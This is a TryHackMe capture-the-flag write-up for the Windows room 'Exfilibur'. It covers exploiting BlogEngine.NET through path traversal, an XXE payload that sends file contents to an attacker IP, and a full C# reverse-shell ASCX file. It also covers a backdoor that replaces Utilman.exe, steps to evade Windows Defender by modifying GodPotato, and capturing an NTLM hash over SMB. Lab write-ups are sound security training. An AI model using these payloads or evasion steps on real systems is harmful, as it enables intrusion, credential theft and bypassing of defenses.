TryHackMe - Exfilibur¶

Introduction¶

OS: Windows

URL: Exfilibur

Level: Hard

The complexity of the room is mostly from the firewall rules and updated Windows Defender Definitions.

There are at least two known ways to root the box when this blog was released. I've tried cover both of them in this writeup.

A Hard rated room (previously rated Medium on release) running BlogEngine.NET on Windows.

- We Exploit a path traversal Vulnerability to get a idea of the file Structure.
- Exploit XXE to get guest user account credentials.
- Using the credentials in a draft post to get to Admin account.
- Upload a malicious ascx file to get a reverse shell.
- Bypass AV Detection
- Exploit SeImpersonatePrivilege using GodPotato to get SYSTEM shell.
- OR use SeTakeOwnershipPrivilege to change Administrator folder ownership and read root flag

Recon¶

First we start Off with a Nmap Scan to check for open ports and services running on the machine.

Web Server¶

Since the only port other than RDP is 80, we start off by checking the web server.

taking a look at the webpage, we see a 403 Forbidden error.

Let's run a Gobuster scan to check for any hidden directories.

User¶

BlogEngine.NET¶

Loading the webpage http://$IP/blog we see that the website is running BlogEngine.NET (version 3.3.7.0)

Path Traversal¶

Looking for known vulnerabilities we find a path traversal vulnerability in the /api/filemanager endpoint. ExploitDB

We can use this to get an idea of the file structure.

GET /blog/api/filemanager?path=/../../../ HTTP/1.1
Host: 10.10.228.229
User-Agent: Mozilla/5.0 
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Mon, 26 Feb 2024 18:48:35 GMT
Connection: close
Content-Length: 527

[
  {
    "IsChecked": false,
    "SortOrder": 0,
    "Created": "2/26/2024 6:48:35 PM",
    "Name": "...",
    "FileSize": "",
    "FileType": 0,
    "FullPath": "~/App_Data/files/../../..",
    "ImgPlaceholder": ""
  },
  {
    "IsChecked": false,                                                                                                                               
    "SortOrder": 1,                                                                                                                                   
    "Created": "8/9/2023 5:28:43 PM",                                                                                                                 
    "Name": "aspnet_client",                                                                                                                          
    "FileSize": "",                                                                                                                                   
    "FileType": 0,                                                                                                                                    
    "FullPath": "~/App_Data/files/../../../aspnet_client",                                                                                            
    "ImgPlaceholder": ""                                                                                                                              
  },                                                                                                                                                  
  {                                                                                                                                                   
    "IsChecked": false,                                                                                                                               
    "SortOrder": 2,                                                                                                                                   
    "Created": "8/9/2023 2:57:50 PM",                                                                                                                 
    "Name": "blog",                                                                                                                                   
    "FileSize": "",                                                                                                                                   
    "FileType": 0,                                                                                                                                    
    "FullPath": "~/App_Data/files/../../../blog",                                                                                                     
    "ImgPlaceholder": ""                                                                                                                              
  }                                                                                                                                                   
] 

Notes

XXE¶

From BlogEngine.NET documentation we know that the /app_data/users.xml file contains the user credentials.

From enumerating the server using the path traversal vulnerability we know that the file is located at C:\inetpub\wwwroot\blog\App_data\users.xml

Now using a XXE vulnerability we can read the contents of the file.

This exploit-db payload seems to be the best fit for our use case.

(there is also another endpoint /blog/metaweblog.axd which is also vulnerable to XXE but won't be covered in this writeup.)

POST /blog/pingback.axd HTTP/1.1
Host: 10.10.228.229
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: text/xml
Content-Length: 130

<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://10.18.18.25:53/ex.dtd">
<foo>&e1;</foo>
<methodName>pingback.ping</methodName>

<!ENTITY % p1 SYSTEM "file:///file/path/to/fetch">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://10.18.18.25:53/X?%p1;'>"> %p2;

Cracking the Password¶

We have two users with the hashed password

• Admin:wobS/AvKFPT5qP9FgQyh7C+REDACTED
• guest:hJg8YPfarcHLhphiH4REDACTED

Let's try to crack the password.

First we need know the hashing algorithm used. Since the source code for BlogEngine.NET is available on GitHub

HashPassword Method is defined here

/// <summary>
/// Encrypts a string using the SHA256 algorithm.
/// </summary>
/// <param name="plainMessage">
/// The plain Message.
/// </param>
/// <returns>
/// The hash password.
/// </returns>
public static string HashPassword(string plainMessage)
{
    var data = Encoding.UTF8.GetBytes(plainMessage);
    using (HashAlgorithm sha = new SHA256Managed())
    {
        sha.TransformFinalBlock(data, 0, data.Length);
        return Convert.ToBase64String(sha.Hash);
    }
}

So to reverse this

string -> base64 decode -> xxd --> hashcat -m 1400 (sha256)

Let's add this to a hash.txt file and use hashcat to crack the password.

So we were only able to crack the hash for the guest user and the password also turns out to be REDACTED.

Guest Account¶

Using the credentials we can login to the blog and see a draft post.

The Draft post leaks a Credential for the Admin account.

Username: admin
Password: **REDACTED**

As our journey through Arthurian lore unfolds, an unexpected revelation comes to light—one that connects the medieval mystique with contemporary cybersecurity practices. 
It is revealed that the very guardian of Camelot's secrets, King Arthur himself, employed a singular key to access the realm's digital 
domain—an administrator's account safeguarded by the password: "**REDACTED**".
This password was not supposed to be reused.

It also hints us about this password potentially being reused.

RCE¶

We can either login to the Admin account now or just keep on using the guest account as user guest is also allowed to upload files.

I've used the reverse shell payload from this exploit.

<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
        static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);

        using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("YOURIPHERE", 139)) {
                using(System.IO.Stream stream = client.GetStream()) {
                        using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                                streamWriter = new System.IO.StreamWriter(stream);

                                StringBuilder strInput = new StringBuilder();

                                System.Diagnostics.Process p = new System.Diagnostics.Process();
                                p.StartInfo.FileName = "cmd.exe";
                                p.StartInfo.CreateNoWindow = true;
                                p.StartInfo.UseShellExecute = false;
                                p.StartInfo.RedirectStandardOutput = true;
                                p.StartInfo.RedirectStandardInput = true;
                                p.StartInfo.RedirectStandardError = true;
                                p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                                p.Start();
                                p.BeginOutputReadLine();

                                while(true) {
                                        strInput.Append(rdr.ReadLine());
                                        p.StandardInput.WriteLine(strInput);
                                        strInput.Remove(0, strInput.Length);
                                }
                        }
                }
        }
    }
    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
        StringBuilder strOutput = new StringBuilder();

        if (!String.IsNullOrEmpty(outLine.Data)) {
                try {
                        strOutput.Append(outLine.Data);
                        streamWriter.WriteLine(strOutput);
                        streamWriter.Flush();
                } catch (Exception err) { }
        }
    }
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>

Since the exploit code doesn't work by default we need a way to upload the PostView.ascx file to the server.

If you open the draft page from the blog that contained the password. You'll notice a icon to open the file manager.

Once you click on you you get a option to upload files. Let's upload the PostView.ascx file there.

This uploads the PostView.ascx file to the C:\inetpub\wwwroot\blog\App_Data\files directory.

Now we can force the website to load the PostView.ascx file by setting our theme path to relative path of the App_Data/files folder using the theme=../../App_Data/files/ cookie.

GET /blog/ HTTP/1.1
Host: 10.10.228.229
User-Agent: python-requests/2.31.0
cookie: theme=../../App_Data/files/
Accept: */*
Connection: close

And we have a shell

Privilege Escalation¶

Method 1

kingarthy¶

Remembering that the draft post mentioned that the password was not supposed to be reused, we can try to use the password for other users on the machine.

We can see that there is a user kingarthy on the machine.

Let's Try to switch to this user using the password we found.

we'll be using the RunasCs.exe tool from here to run commands as a different user.

FORMAT RunasCs.exe username password "cmd /c whoami"

As you can see running without --bypass-uac you'll miss a lot of privileges. (same for a CMD/PS non admin prompt in RDP)

SeTakeOwnershipPrivilege¶

since we have SeTakeOwnershipPrivilege we can take ownership of the C:\Users\Administrator folder and read the root flag.

or better yet replace C:\Windows\System32\Utilman.exe with cmd.exe with to trigger a Admin shell in the RDP login screen.

Utilman.exe¶

takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant kingarthy:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe

Now we can use xfreerdp Login and then get to the lock screen and click on the Ease of Access button to get a Admin shell.

SeImpersonatePrivilege¶

Method 2

The webserver is running under merlin user. From RCE we already have a Shell as merlin.

If we take a look at the privileges of the merlin user we can see that SeImpersonatePrivilege is enabled.

We can make use of one of the newer potato exploits named GodPotato to get a SYSTEM shell.

We can download the GodPotato prebuild binary from here

But since the defender definitions are updated we can't run the GodPotato binary as it's detected as a virus.

Bypassing AV Detection¶

For this I used a Windows VM + Visual Studio to compile the GodPotato binary from source.

You can download the source for GodPotato from here

Since the AV is probably doing a static analysis of the binary, we can try to change the binary to bypass the detection.

• Change any unique strings in the binary
• change compile type to prefer smaller size (stripping out debug info, symbols, etc)
• Many of the rules target the help usage strings, so you can change those
• rename any references to GodPotato in the source code replacing it with something else. (Make sure it's case-sensitive as GodPotato and godPotato are different variables)

While doing all the above steps I kept checking strings to see if the binary still had any unique strings.

Steps taken:

• replaced GodPotato with PleaseSub,
• godPotato with pleaseSub
• changed the program name to gp.exe
• changed the Assembly Guid to the one from Microsoft's documentation
• Replaced the ASCII art for GodPotato with random strings

Even after all this the binary was still detected by the AV.

16-bit encoding¶

I had forgotten to check for 16-bit encoded strings in the binary.

strings -e l executable.exe | less will show you the 16-bit encoded strings in the binary.

But everything was in vain as the binary was still detected by the AV.

Digging through I narrowed it to this line

private static readonly Guid orcbRPCGuid = new Guid("18f70770-8e64-11cf-9af1-0020af6e72f4");

But we cannot just remove or replace this as it is critical for its functionality to later load combase.dll

So easiest method to patch it is to base64 encode and then decode it at runtime.

<...SNIP...>
namespace PleaseSub.NativeAPI
{
    public class PleaseSubContext
    {
        private static readonly Guid orcbRPCGuid = new Guid(Encoding.UTF8.GetString(Convert.FromBase64String("MThmNzA3NzAtOGU2NC0xMWNmLTlhZjEtMDAyMGFmNmU3MmY0")));
        public IntPtr CombaseModule { get; private set; }
        public IntPtr DispatchTablePtr { get; private set; }
        public IntPtr UseProtseqFunctionPtr { get; private set; } = IntPtr.Zero;
        public uint UseProtseqFunctionParamCount { get; private set; } = 0xffffff;
<...SNIP...>

<...SNIP...>
namespace GodPotato.NativeAPI
{
    public class GodPotatoContext
    {
        private static readonly Guid orcbRPCGuid = new Guid("18f70770-8e64-11cf-9af1-0020af6e72f4");
        public IntPtr CombaseModule { get; private set; }
        public IntPtr DispatchTablePtr { get; private set; }
        public IntPtr UseProtseqFunctionPtr { get; private set; } = IntPtr.Zero;
        public uint UseProtseqFunctionParamCount { get; private set; } = 0xffffff;
<...SNIP...>

Compile this binary, and it's no longer detected by Windows Defender.

Extras¶

Leaking merlin Hash using XXE¶

We can also use the XXE vulnerability to leak the merlin user's hash by making the XXE payload connect to a SMB share.

First We need to setup responder to capture the hash.

sudo responder -I tun0

POST /blog/pingback.axd HTTP/1.1
Host: 10.10.194.240
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: text/xml
Content-Length: 132

<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "file://///10.18.18.25/dir/file">
<foo>&e1;</foo>
<methodName>pingback.ping</methodName>

But this hash is not crackable, --lm downgrade attack isn't possible either as NTLMv1 is disabled on the server.